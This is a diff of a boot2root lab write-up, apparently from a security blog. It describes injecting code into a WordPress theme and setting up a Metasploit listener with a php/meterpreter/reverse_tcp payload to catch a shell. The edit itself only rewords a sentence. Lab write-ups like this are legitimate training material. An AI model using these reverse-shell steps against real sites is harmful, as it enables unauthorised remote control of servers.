PacketFire/packetfire_site/content/post/internal-boot2root-writeup.md

 ![wordpress template injection](/img/internal_http_wp_shell_injection.png)

-Prior to saving the theme I prepped a listener in using the `exploit/multi/handler` in metasploit to catch the new meterpreter session.
+Prior to saving the theme, I prepped a listener in using the `exploit/multi/handler` module in metasploit to catch the new meterpreter session.

 ```
 msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp